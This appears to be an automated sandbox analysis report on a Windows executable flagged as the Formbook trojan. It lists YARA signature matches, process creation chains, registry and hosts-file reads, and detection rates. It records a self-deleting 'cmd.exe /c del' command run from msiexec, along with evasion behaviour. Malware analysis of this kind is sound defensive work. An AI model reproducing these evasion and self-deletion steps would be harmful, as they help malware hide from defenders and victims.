          Source: 00000003.00000002.728247735.0000000001870000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.728247735.0000000001870000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.909537061.0000000000610000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.909537061.0000000000610000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.668734008.00000000039F9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.668734008.00000000039F9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.g1EhgmCqCD.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.g1EhgmCqCD.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.g1EhgmCqCD.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.g1EhgmCqCD.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: g1EhgmCqCD.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@13/5
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\g1EhgmCqCD.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7116:120:WilError_01
          Source: g1EhgmCqCD.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: g1EhgmCqCD.exe, 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
          Source: g1EhgmCqCD.exe, 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: g1EhgmCqCD.exe, 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE id=@id;
          Source: g1EhgmCqCD.exe, 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
          Source: g1EhgmCqCD.exe, 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
          Source: g1EhgmCqCD.exe, 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
          Source: g1EhgmCqCD.exe, 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: g1EhgmCqCD.exe, 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmpBinary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
          Source: g1EhgmCqCD.exe, 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
          Source: g1EhgmCqCD.exeVirustotal: Detection: 19%
          Source: g1EhgmCqCD.exeReversingLabs: Detection: 25%
          Source: unknownProcess created: C:\Users\user\Desktop\g1EhgmCqCD.exe 'C:\Users\user\Desktop\g1EhgmCqCD.exe'
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess created: C:\Users\user\Desktop\g1EhgmCqCD.exe C:\Users\user\Desktop\g1EhgmCqCD.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\g1EhgmCqCD.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess created: C:\Users\user\Desktop\g1EhgmCqCD.exe C:\Users\user\Desktop\g1EhgmCqCD.exeJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\g1EhgmCqCD.exe'Jump to behavior
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8856F961-340A-11D0-A96B-00C04FD705A2}\InProcServer32